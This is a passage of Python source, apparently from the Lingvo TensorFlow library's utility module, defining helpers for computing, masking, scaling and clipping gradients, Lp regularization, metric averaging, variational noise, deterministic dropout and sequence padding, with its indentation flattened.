* `variable`: skip if the entire variable's gradients are almost zero;
reduce_sum(abs(grads)) < 1e-8.
* `weight`: skip if the individual weight's gradients are almost zero:
abs(grad) < 1e-8.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce. This applies to TPU only.
Returns:
var_grad - a `.NestedMap` of VarGrad. You can view
var_grad as an ordered list of (key, (var, grad)) tuples. Every
key of var_grad exists in vmap. Every variable in vmap that
contributes to loss must exist in var_grad. Every var of var_grad
must exist in vmap. grad is the corresponding gradient computed
for var. grad is guaranteed to be not None.
"""
loss = HasRank(loss, 0)
assert isinstance(vmap, NestedMap)
assert skip_zero_gradients in (None, 'variable', 'weight')
# Uniqify and remove None.
filtered_vmap = vmap.Filter(_Unique())
assert filtered_vmap is not None
# Filter out variables not contributing to 'loss'.
trainable_variables = set(tf.trainable_variables())
dependent_ops_and_tensors = set(FindNeeded([loss]))
def Needed(v):
if isinstance(v, tf.Variable):
if v not in trainable_variables:
# Skip non-trainable variables. Otherwise,
# tf.Optimizer.apply_gradients throws up an exception instead
# of skipping the update.
return False
return True
filtered_vmap = filtered_vmap.Filter(Needed)
assert filtered_vmap is not None
filtered_vlist = filtered_vmap.Flatten()
# Use caller-supplied gradient function if supplied.
if compute_gradients_fn is not None:
take_grad = compute_gradients_fn
else:
# tpu vs non-tpu is slightly different.
if use_tpu():
take_grad = functools.partial(
_ComputeGradientsTpu,
skip_zero_gradients=skip_zero_gradients,
use_bf16_gradients_ar=use_bf16_gradients_ar)
else:
take_grad = ComputeGradientsSimple
grads = take_grad(loss, filtered_vlist, grad_aggregation_method,
colocate_gradients_with_ops, gate_gradients)
# Formulate pairs of (var, grad) and pack them into the same
# structure as filtered_vmap.
var_grads = filtered_vmap.Pack(
[VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
# TPU training is not compatible with the variable name check below when
# control flow v2 is enabled. The main reason is the body function will be
# encapsulated as a TF function while variables will be lifted out, and as a
# result dependent_ops_and_tensors will not contain any variables. See
# b/150689507 for more info.
if not tf.compat.v1.control_flow_v2_enabled():
    # Check that gradients for variables that are not needed by the current
    # task are None.
def CheckGrad(vg):
if vg.var.name not in dependent_ops_and_tensors and vg.grad is not None:
err_msg = ('Variable %s is not a dependent of %s, expect '
'gradient be None, but got %s. This should not happen, '
'please contact the owner of b/150689507 for further '
'investigation.' % (str(vg.var), str(loss), str(vg.grad)))
assert False, err_msg
return True
var_grads = var_grads.Filter(CheckGrad)
# Removes pairs whose grad is None.
for key, (_, g) in var_grads.FlattenItems():
if g is None:
tf.logging.info('ComputeGradients drops %s', key)
return var_grads.Filter(lambda var_grad: var_grad.grad is not None)
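# Illustrative sketch (not part of the original code): typical use of
# ComputeGradients. `loss` is a scalar Tensor and `model_vars` is a NestedMap
# of tf.Variables; both names are placeholders.
#
#   var_grads = ComputeGradients(loss, model_vars)
#   for name, vg in var_grads.FlattenItems():
#     tf.logging.info('%s: grad of %s has shape %s', name, vg.var.name,
#                     vg.grad.shape)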
def MaskGradients(var_grad, grad_mask):
"""Computes gradients of non-masked variables in vmap w.r.t loss.
Args:
var_grad: A `.NestedMap` of (variable, gradient)
grad_mask: A dict of (variable name, mask).
Returns:
var_grad - a `.NestedMap` of (variable, mask * gradient).
"""
def ApplyMask(entry):
var, grad = entry
mask = grad_mask[var.name]
if isinstance(grad, tf.IndexedSlices):
return VarGrad(var, tf.IndexedSlices(grad.values * mask, grad.indices))
else:
return VarGrad(var, grad * mask)
return var_grad.Transform(ApplyMask)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
"""Scale gradients by grad_scale on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
applies to every entry.
Returns:
A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ScaleOrZero(var, grad, scale):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.where(
tf.equal(scale, 0.), tf.zeros_like(grad),
tf.cast(scale, grad.dtype) * grad)
def Scale(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
if grad_scale is None:
scale = item.scale
else:
scale = grad_scale
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ScaleOrZero(var, grad.values, scale), grad.indices,
grad.dense_shape)
else:
grad = ScaleOrZero(var, grad, scale)
return VarGrad(var, grad)
return vs_gs.Transform(Scale)
def HasNanOrInfGradient(var_grads):
"""Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.
Args:
var_grads: A `.NestedMap` with (var, grad) tuple as the map value.
Returns:
A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
"""
def HasNanOrInf(x):
if isinstance(x, tf.IndexedSlices):
x = x.values
with tf.device(x.device):
if x.dtype.is_complex:
return tf.reduce_any(
[HasNanOrInf(tf.math.real(x)),
HasNanOrInf(tf.math.imag(x))])
return tf.reduce_any(
tf.math.logical_or(tf.math.is_nan(x), tf.math.is_inf(x)))
return tf.reduce_any([HasNanOrInf(g) for (_, g) in var_grads.Flatten()])
def ApplyGradNormClipping(vs_gs, norm=1.0):
"""Clip gradients to norm on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
value of `norm`.
Returns:
A `.NestedMap` of VarGrad(variable, scaled_gradient). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ClipByNorm(var, grad, norm):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.clip_by_norm(grad, norm)
def Clip(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ClipByNorm(var, grad.values, norm), grad.indices, grad.dense_shape)
else:
grad = ClipByNorm(var, grad, norm)
return VarGrad(var, grad)
return vs_gs.Transform(Clip)
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
"""Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.
Args:
var_grads: a `.NestedMap` or list of (variable, gradient).
lp_regularizer_weight: Lp regularization weight.
p: For now we support 1.0 or 2.0.
Returns:
A tuple (lp_loss, var_grads).
- lp_loss: A scalar. The lp loss.
- var_grads: a `.NestedMap` or list of (variable, gradient) regulated by Lp.
"""
# TODO(yuancao): For now we support p=1 or 2, but this can be extended to
# lp-norm in general.
assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'
def GetVar(item):
var, grad = item
if isinstance(grad, tf.IndexedSlices):
with tf.device(var.device):
ids = HasRank(grad.indices, 1)
uniq_ids = tf.unique(ids).y
return tf.gather(var, uniq_ids)
else:
return var
def ShouldAdjust(v):
return v not in tf.get_collection(SKIP_LP_REGULARIZATION)
filtered_var_grads = [
var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
]
filtered_vars = Transform(GetVar, filtered_var_grads)
for v in filtered_vars:
tf.logging.info('AdjustGradientsWithLpLoss: %s', v.name)
if p == 2.0:
lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
elif p == 1.0:
lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)
def LpGrad(var_grad):
"""Adjusts item's grad w/ Lp loss term."""
var, grad = var_grad
if isinstance(grad, tf.IndexedSlices):
# Question(rpang): do we apply Lp loss here even if 'var' is in
# SKIP_LP_REGULARIZATION?
#
      # Note: IndexedSlices appears for embedding lookups.
      # Embedding lookup ids can contain duplicates. For duplicated ids, we
      # only want to count each id once.
with tf.device(var.device):
emb = HasRank(var, 2)
vocab_size = tf.shape(emb)[0]
ids = HasRank(grad.indices, 1)
values = tf.gather(emb, ids) # [#ids, dims]
with tf.device(grad.device):
        # counts is a vector of size vocab_size. counts[i] is the number of
        # occurrences of the i-th word in 'ids'.
counts = tf.math.unsorted_segment_sum(
tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)
# Gradients for duplicated ids will be summed when they get
# applied, and hence we account for that by first dividing
# gradient resulting from lp loss by how many times the id is
# duplicated.
#
# For each id in 'ids', we know counts[id] is non-zero,
# hence, it's always safe to take reciprocal.
weights = tf.math.reciprocal(tf.gather(counts, ids))
weights = tf.expand_dims(weights, -1) # [#ids, 1]
if p == 2.0:
grad_v = values
elif p == 1.0:
grad_v = tf.sign(values)
delta = lp_regularizer_weight * weights * grad_v
grad = tf.IndexedSlices(grad.values + delta, ids)
elif var not in tf.get_collection(SKIP_LP_REGULARIZATION):
with tf.device(var.device):
if p == 2.0:
grad_v = var
elif p == 1.0:
grad_v = tf.sign(var)
delta = lp_regularizer_weight * grad_v
with tf.device(grad.device):
grad += delta
return VarGrad(var, grad)
return lp_loss, Transform(LpGrad, var_grads)
def SplitRecursively(x, num_splits, axis=-1):
"""Splits Tensors in 'x' recursively.
Args:
    x: a Tensor, or a list or NestedMap containing Tensors to split.
num_splits: number of splits per Tensor.
axis: the split axis.
Returns:
A list of split values of length 'num_splits'.
- If 'x' is a Tensor, a list of split Tensors.
- If 'x' is a list, a list of lists, where each sublist has the same length
as 'x' and the k'th element in each sublist corresponds to a split of the
k'th element from 'x'.
- If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
corresponds to a split from the same field of 'x'.
"""
if isinstance(x, tf.Tensor):
return tf.split(x, num_splits, axis=axis)
elif isinstance(x, list):
splits = [SplitRecursively(element, num_splits, axis) for element in x]
splits = list(zip(*splits))
return [list(t) for t in splits]
elif isinstance(x, NestedMap):
results = [NestedMap() for _ in range(num_splits)]
for key, val in six.iteritems(x):
val_splits = SplitRecursively(val, num_splits, axis)
for i in range(num_splits):
results[i][key] = val_splits[i]
return results
else:
raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
"""Concatenates tensors from 'splits'.
This is the inverse function of SplitRecursively.
Args:
splits: a list of splits to concatenate, where elements can be Tensors,
lists, or `.NestedMap`. The elements must share the same type and
structure. For example, list elements must have the same length;
`.NestedMap` must have the same set of fields.
axis: the concatenation axis.
Returns:
Concatenated data.
- If input 'splits' are Tensors, returns a concatenated Tensor.
- If input 'splits' are lists, returns a list of the same length where the
k'th element represents concatenated data of the k'th element from each
split.
- If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each field
concatenated from corresponding fields of input splits.
Raises:
TypeError: if 'splits' is not a list or elements of 'splits' do not have
known or matching types.
ValueError: if 'splits' is empty or elements of 'splits' do not have
matching structures.
"""
if not isinstance(splits, list):
raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
if not splits:
raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
tmpl = splits[0]
if isinstance(tmpl, tf.Tensor):
return tf.concat(splits, axis=axis)
elif isinstance(tmpl, list):
if not all(isinstance(split, list) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
if not all(len(split) == len(tmpl) for split in splits):
raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
return [
ConcatRecursively([split[i]
for split in splits], axis)
for i in range(len(tmpl))
]
elif isinstance(tmpl, NestedMap):
if not all(isinstance(split, NestedMap) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
results = NestedMap()
for key in tmpl:
results[key] = ConcatRecursively([split[key] for split in splits], axis)
return results
else:
raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
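# Illustrative sketch (not part of the original code): SplitRecursively and
# ConcatRecursively are inverses of each other over nested structures. The
# tensors below are placeholders.
#
#   x = NestedMap(a=tf.ones([2, 8]), b=[tf.zeros([2, 4])])
#   parts = SplitRecursively(x, 2)  # 2 NestedMaps; a: [2, 4], b: [[2, 2]]
#   y = ConcatRecursively(parts)    # same structure and shapes as x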
def AddToPruningCollections(weight,
mask,
threshold,
gradient=None,
old_weight=None,
old_old_weight=None):
"""Add mask, threshold, and weight vars to their respective collections."""
if mask not in tf.get_collection(pruning.MASK_COLLECTION):
tf.add_to_collection(pruning.WEIGHT_COLLECTION, weight)
tf.add_to_collection(pruning.MASK_COLLECTION, mask)
tf.add_to_collection(pruning.THRESHOLD_COLLECTION, threshold)
# Add gradient, old_weight, and old_old_weight to collections approximating
# gradient and hessian, where old_weight is the weight tensor one step
# before and old_old_weight is the weight tensor two steps before.
if gradient is not None:
assert old_weight is not None
assert old_old_weight is not None
tf.add_to_collection(pruning.WEIGHT_GRADIENT_COLLECTION, gradient)
tf.add_to_collection(pruning.OLD_WEIGHT_COLLECTION, old_weight)
tf.add_to_collection(pruning.OLD_OLD_WEIGHT_COLLECTION, old_old_weight)
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
"""Computes weighted average of values from a tensor.
Args:
values: a tensor of values
weights: a tensor of weights
    sum_reduction_fn: called to reduce the values and weights to a single value
name: name of metric.
Returns:
A tuple (avg, total_weight).
- avg: weighted average value
- total_weight: sum of all weights
"""
msg = 'shape of values and weights tensors must match for metric ' + name
values = with_dependencies(
[assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
total_weight = sum_reduction_fn(weights)
avg = sum_reduction_fn(values * tf.cast(weights, values.dtype)) / tf.cast(
total_weight, values.dtype)
return avg, total_weight
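# Illustrative sketch (not part of the original code): WeightedAvg over a small
# batch of per-example values and weights (placeholder numbers).
#
#   values = tf.constant([1., 2., 3.])
#   weights = tf.constant([1., 1., 2.])
#   avg, total = WeightedAvg(values, weights)  # avg == 2.25, total == 4.0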
def WeightedAvgOfMetrics(metrics):
"""Computes the weighted average of metrics in the list.
Args:
metrics: list of dictionaries of metrics
Returns:
    ret_dict - dictionary of weighted averages for each metric.
"""
ret_dict = {}
lists_of_metrics = {}
for m in metrics:
for name, (value, weight) in six.iteritems(m):
if name not in lists_of_metrics:
lists_of_metrics[name] = []
lists_of_metrics[name].append((value, weight))
for name, values_and_weights in sorted(six.iteritems(lists_of_metrics)):
values = tf.stack([x[0] for x in values_and_weights])
weights = tf.stack([x[1] for x in values_and_weights])
ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
return ret_dict
def ConcatPerExampleTensors(per_example):
"""Concatenate per-example tensors from many hosts into one large block.
Args:
per_example: list of dictionaries of per-example tensors.
Returns:
ret_dict - string -> concatenated tensors.
"""
ret_dict = {}
lists_of_per_example = {}
for m in per_example:
for name, value in six.iteritems(m):
if name not in lists_of_per_example:
lists_of_per_example[name] = []
lists_of_per_example[name].append(value)
for name, values in sorted(six.iteritems(lists_of_per_example)):
ret_dict[name] = tf.concat(values, 0)
return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
"""Combines metrics from `loss_metric_weight_pairs` according to weights.
  Each key must either exist in all metrics dicts, in which case it is combined
  as a weighted sum, or exist in only one metrics dict, in which case it is
  copied.
Args:
loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
weight is a float and each metrics is a dict with str keys and
(metric_value, target_weight) values.
Returns:
A dict with the same set of keys as input metrics and values of
(weighted_sum(metric_value), weighted_sum(target_weight)).
Raises:
ValueError: if there exists a metric that exists in more than one element
of `loss_metric_weight_pairs` but not in all of them.
"""
all_keys = set([
k for loss_metrics, _ in loss_metric_weight_pairs
for k in six.iterkeys(loss_metrics)
])
result = {}
for k in all_keys:
count = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
count += 1
if count > 1 and count != len(loss_metric_weight_pairs):
      raise ValueError('Found metric %s which exists in more than one '
                       'but not all loss metrics.' % k)
total_val = 0
total_target_weight = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
val, target_weight = loss_metrics[k]
if count == 1:
# Single metric, don't multiply by weight.
total_val = val * target_weight
total_target_weight = target_weight
else:
# Total weighted sum of all predictions.
total_val += weight * val * target_weight
total_target_weight += weight * target_weight
result[k] = (total_val / total_target_weight, total_target_weight)
return result
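# Illustrative sketch (not part of the original code): combining the same
# metric from two tasks with weights 0.7 and 0.3. Each metrics dict maps a name
# to a (value, target_weight) pair; all names below are placeholders.
#
#   task_a = {'loss': (loss_a, num_frames_a)}
#   task_b = {'loss': (loss_b, num_frames_b)}
#   combined = CombineMetrics([(task_a, 0.7), (task_b, 0.3)])
#   # combined['loss'] is (weighted loss, weighted total target weight).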
def _AddVN(p, x, step=None):
assert p.vn.scale is not None
seed = p.vn.seed
if seed and step:
seed += step * 203984
noises = tf.cast(p.vn.scale, x.dtype) * tf.random.normal(
tf.shape(x), stddev=1.0, seed=seed, dtype=x.dtype)
return x + noises
def AddGlobalVN(params, weights):
"""Adds variational noise to weights if specified by params."""
p = params
if p.vn.global_vn:
weights = _AddVN(p, weights)
return weights
def AddPerStepVN(params, weights, step=None):
"""Adds per-setp variational noise to weights if specified by params."""
p = params
if p.vn.per_step_vn:
weights = _AddVN(p, weights, step)
return weights
def VariationalNoiseParams(scale,
global_vn=False,
per_step_vn=False,
seed=None):
"""Returns a hyperparams for variational noise."""
p = hyperparams.Params()
p.Define(
'scale', scale,
      'Std of the variational noise to apply. This can be a scalar,'
' or a scalar tensor.')
p.Define('global_vn', global_vn,
           'Adds global variational noise every training step iff True.')
p.Define('per_step_vn', per_step_vn,
           'Adds per-timestep variational noise iff True.')
p.Define('seed', seed, 'Random seed used to generate noise.')
return p
# To disable VN for a layer, we use 1.0 as the first parameter of the following
# function: otherwise the params would be identical to the DefaultVN()
# configuration of base_layer, which gets overwritten by the parent
# configuration in CopyBaseParams().
def DisableVN():
return VariationalNoiseParams(1.0, False, False)
def GetStepSeed():
"""Gets step_seed."""
step_seed_tensors = tf.get_default_graph().get_collection_ref('step_seed')
if not step_seed_tensors:
ResetStepSeed()
return GetStepSeed()
elif len(step_seed_tensors) == 1:
return step_seed_tensors[0]
else:
raise ValueError('Multiple tensors in step_seed collection.')
def ResetStepSeed(seed=0):
"""Resets step_seed to specified value."""
new_step_seed = tf.convert_to_tensor(seed, dtype=tf.int64)
step_seed_tensors = tf.get_default_graph().get_collection_ref('step_seed')
if len(step_seed_tensors) == 1:
step_seed_tensors[0] = new_step_seed
elif not step_seed_tensors:
tf.add_to_collection('step_seed', new_step_seed)
else:
raise ValueError('Multiple tensors in step_seed collection.')
def GetIncStepSeed():
"""Returns and increments the step_seed."""
step_seed = GetStepSeed()
# TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
# independent of underlying PRNG used by tensorflow.
ResetStepSeed(step_seed + 1)
return step_seed
def GenerateStepSeedPair(p, global_step, op_seed=None):
"""Generates a seed pair for deterministic random operations in functional loops.
This function retrieves a unique seed pair on each call, based off the current
global step and step seed. The step seed ensures this function returns a
unique seed pair on each call: calling this function automatically increments
the step seed. The step seed is automatically reset at the beginning of each
global step in the model's FProp and works transparently through recurrent.py.
Args:
p: A hyperparams.Params object, containing keys 'random_seed' and
'is_inference'.
global_step: The global step.
op_seed: An additional operation-level seed to apply.
Returns:
A size 2 tensor of op seeds to use for stateless_random ops.
"""
seed_dtype = tf.int32 if use_tpu() else tf.int64
if p.is_inference and p.random_seed is None:
# Ensure GetIncStepSeed is called even inside the shortcut.
# This ensures if p.random_seed is set for other ops that use this function
# that they will get the same seed pair whether or not p.random_seed is set
# for this specific call.
GetIncStepSeed()
# Unlike tf.random*, stateless random ops are completely determined by the
# passed-in seeds. This means at inference time the same inputs will produce
# the same outputs, even if the model is supposed to have randomness such as
# dropout during inference. We inject additional randomness only during
# inference if the graph is exported with random_seed=None as a workaround.
return tf.random.uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
global_step = tf.cast(global_step, seed_dtype)
step_seed = tf.cast(GetIncStepSeed(), seed_dtype)
seeds = tf.stack([global_step, step_seed])
if p.random_seed is not None:
seeds += p.random_seed
if op_seed is not None:
seeds += op_seed
return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
"""Similar to `tf.nn.dropout()`, but fully deterministic.
Args:
x: A float Tensor on which to apply dropout.
keep_prob: A scalar `Tensor` of keep probability.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated keep/drop flags.
name: An optional name for this operation.
Returns:
A Tensor with the same shape as `x`.
Raises:
InvalidArgumentError: if keep_prob is invalid.
"""
if isinstance(keep_prob, numbers.Real):
if keep_prob <= 0 or keep_prob > 1:
      raise tf.errors.InvalidArgumentError(
          None, None,
          'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
if keep_prob == 1:
return x
with tf.name_scope(name, 'dropout', [x]) as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
keep_prob = tf.convert_to_tensor(
keep_prob, dtype=tf.float32, name='keep_prob')
# uniform in [keep_prob, 1.0 + keep_prob)
# StatelessRandomUniform op does not support non-float (e.g. bfloat16) dtype
# and non-int32 seed types.
noise_shape = noise_shape or GetShape(x)
random_tensor = keep_prob + tf.random.stateless_uniform(
noise_shape, seed=seeds, dtype=tf.float32)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
if x.dtype != tf.float32:
binary_tensor = tf.cast(binary_tensor, x.dtype)
keep_prob = tf.cast(keep_prob, dtype=x.dtype)
result = tf.div(x, keep_prob) * binary_tensor
result.set_shape(x.get_shape())
return result
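# Illustrative sketch (not part of the original code): deterministic dropout
# driven by GenerateStepSeedPair, so the same step and seeds reproduce the same
# mask. `p` and `global_step` are placeholders for a layer's params and the
# step tensor.
#
#   seeds = GenerateStepSeedPair(p, global_step)
#   y = DeterministicDropout(x, keep_prob=0.9, seeds=seeds)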
def DeterministicVN(params, seeds, noise_shape, mean=0.0, std=1.0, name=None):
"""Produces Fully deterministic Gaussian noise from shape, mean and std.
Args:
params: Nested map of params.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated Gaussian noise.
mean: Mean for the Gaussian noise.
std: Standard deviation for noise.
name: An optional name for this operation.
Returns:
A Tensor with the shape noise_shape and type fprop_dtype.
"""
with tf.name_scope(name, 'gaussian_noise') as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
random_tensor = mean + (
std * tf.random.stateless_normal(noise_shape, seed=seeds))
if FPropDtype(params) != tf.float32:
random_tensor = tf.cast(random_tensor, FPropDtype(params))
return random_tensor
BATCH_NORM_UPDATES = 'batch_norm_updates'
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
"""Update batch normalization moving averages."""
with tf.name_scope(
'AssignMovingAvg', values=[
batch_norm_var,
batch_norm_stats,
decay,
]) as scope:
with tf.ops.colocate_with(batch_norm_var):
decay = tf.convert_to_tensor(
1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
update_delta = (batch_norm_var - batch_norm_stats) * decay
has_nan_or_inf = tf.reduce_any(
tf.math.logical_or(
tf.math.is_nan(update_delta), tf.math.is_inf(update_delta)))
update_delta = tf.cond(has_nan_or_inf,
lambda: tf.zeros_like(update_delta),
lambda: update_delta)
bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
bn_update_dict = _get_batch_norm_updates_dict()
assert bn_update.name not in bn_update_dict
bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
"""Finds and returns a list of relevant batch-normalization updates.
Args:
loss: The loss that is being optimized for. A tensor or a list of tensors.
batch_norm_updates: A list of batch normalization updates.
Returns:
A pair of lists. The first list contains all the batch normalization updates
that are relevant to the loss being optimized, and the second list contains
all in batch_norm_updates but not in the first list.
"""
dependent_ops_and_tensors = set(FindNeeded(loss))
relevant_updates = []
irrelevant_updates = []
bn_update_dict = _get_batch_norm_updates_dict()
for bn_update in batch_norm_updates:
    assert bn_update.name in bn_update_dict, (
        '%s is probably not a valid batch normalization update op.'
        ' Make sure batch normalization is done through calling'
        ' the py_utils.UpdateBatchNormVars helper routine.' % bn_update.name)
bn_stat_name = bn_update_dict[bn_update.name][1].name
if bn_stat_name in dependent_ops_and_tensors:
# If a batch normalization stat is computed in the forward pass in
# computing loss, then the corresponding batch normalization update is
# relevant. Otherwise, it is not.
relevant_updates.append(bn_update)
else:
irrelevant_updates.append(bn_update)
return relevant_updates, irrelevant_updates
_SAMPLE_STEP_KEY = 'sample_step'
@contextlib.contextmanager
def SampleStep(step):
"""A context for a sample step during decoding.
Example usage::
with py_utils.SampleStep(step):
sample = self.DecodeOneStep()
Args:
step: the step tensor.
Yields:
a context manager for the step scope.
"""
stack = tf.get_collection_ref(_SAMPLE_STEP_KEY)
try:
stack.append(step)
yield step
finally:
stack.pop()
def _GetSampleStep():
stack = tf.get_collection(_SAMPLE_STEP_KEY)
return stack[-1] if stack else None
def AddDebugTensor(tensor, summarize=None, name=None):
"""Adds `tensor` to the debug collection.
Prints the tensor if `--print_debug_tensors` is True.
Args:
tensor: A tensor.
summarize: Only print this many entries of each tensor. If None, then a
maximum of 3 elements are printed per input tensor.
name: An optional name for the tensor.
Returns:
A Tensor that evaluates to the same value as the input tensor.
"""
if _FromGlobal('print_debug_tensors'):
step = _GetSampleStep()
tensors_to_print = ([] if step is None else [step]) + [tensor]
with tf.name_scope(name) as s:
tensor = tf.Print(
tensor,
tensors_to_print,
message='DEBUG tensor %s' % s,
name=name,
summarize=summarize)
return tensor
def ArgMax(inputs):
"""tf.argmax wrapper.
Args:
inputs: A tensor, whose last dimension is being reduced on.
Returns:
    A tensor of rank tf.rank(inputs)-1. If i == ret[indices],
    inputs[indices, i] is the maximum among inputs[indices, :].
"""
if use_tpu():
return tf.argmax(inputs, axis=-1, output_type=tf.int32)
else:
return tf.argmax(inputs, axis=-1)
def _EnsureMatrixShape(x):
if x.shape.ndims is None:
x.set_shape([None, None])
else:
assert x.shape.ndims == 2
return x
def Matmul(x, y, *args, **kwargs):
"""tf.matmul wrapper expecting x and y are actually matrices."""
x = _EnsureMatrixShape(x)
y = _EnsureMatrixShape(y)
return tf.matmul(x, y, *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None): # pylint: disable=invalid-name
if t.dtype.is_complex:
return tf.complex(
tf.clip_by_value(
tf.math.real(t), clip_value_min, clip_value_max, '%s_real' % name),
tf.clip_by_value(
tf.math.imag(t), clip_value_min, clip_value_max, '%s_imag' % name))
return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
def _TransformAndSum(tensor_list, transform):
with tf.name_scope('TransformAndSum'):
sum_transform = []
for t in tensor_list:
with tf.device(t.device):
if isinstance(t, tf.IndexedSlices):
sum_transform += [tf.reduce_sum(transform(t.values))]
else:
sum_transform += [tf.reduce_sum(transform(t))]
return tf.add_n(sum_transform)
def SumSquared(tensor_list):
return _TransformAndSum(tensor_list, lambda v: tf.abs(v)**2)
def SumAbs(tensor_list):
return _TransformAndSum(tensor_list, tf.abs)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
"""Returns the piecewise value of x_in."""
x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
assert len(values) == len(boundaries) + 1
assert sorted(boundaries) == list(boundaries)
bs = tf.convert_to_tensor(boundaries, dtype=tf.float32)
vs = tf.convert_to_tensor(values, dtype=vdtype)
# The following is equivalent to 'return vs[index]'.
index = tf.reduce_sum(tf.cast(tf.greater_equal(x_in, bs), tf.int32))
one_hot_vec = tf.one_hot(
tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
return Matmul(tf.reshape(vs, (1, -1)), tf.transpose(one_hot_vec))[0][0]
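# Illustrative sketch (not part of the original code): a piecewise-constant
# learning-rate schedule keyed on the global step (boundary and value numbers
# are arbitrary).
#
#   lr = PiecewiseConstant(GetGlobalStep(), boundaries=[10000, 20000],
#                          values=[1e-3, 1e-4, 1e-5], vdtype=tf.float32)
#   # lr == 1e-3 for step < 10000, 1e-4 for 10000 <= step < 20000, else 1e-5.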
def PadSequenceDimension(x, length, pad_val, shape=None):
"""Pads x to `length` using `pad_val` along the second dim.
Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
along the second dim. Explicitly sets the returned tensor shape to `shape` if
given. Raises runtime errors if x.shape[1] > length or x.shape[i] != shape[i]
where i != 1.
Args:
x: the tensor to be padded with shape [batch, seq_len, ...].
length: an int to specify the length to pad x to.
pad_val: an int or float used to pad x.
shape: an int array specifying the shape of the padded tensor if specified.
Returns:
The padded tensor with shape [batch, seq_len, ...], where
ret[:, :seq_len, ...] == x.
"""
if x.shape.ndims is not None:
rank = x.shape.ndims
assert rank >= 2
slen = GetShape(x, rank)[1]
pad_len = length - slen
pad = [[0, 0] for _ in range(rank)]
pad[1][1] = pad_len
else:
rank = tf.rank(x)
with tf.control_dependencies([assert_greater_equal(rank, 2)]):
slen = tf.shape(x)[1]
pad_len = length - slen
pad = tf.scatter_nd([[1, 1]], [pad_len], [rank, 2])
x = tf.pad(x, pad, constant_values=pad_val)
if x.shape.ndims is not None and isinstance(length, int):
static_shape = x.shape.as_list()
static_shape[1] = length
x.set_shape(static_shape)
if shape:
if not isinstance(shape, (list, tuple)):
raise TypeError('Shape must be a list or tuple.')
x = HasRank(x, len(shape))
x = tf.ensure_shape(x, shape)
return x
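# Illustrative sketch (not part of the original code): padding a
# [batch, seqlen, dim] tensor along the sequence dimension (shapes are
# placeholders).
#
#   x = tf.zeros([4, 7, 16])
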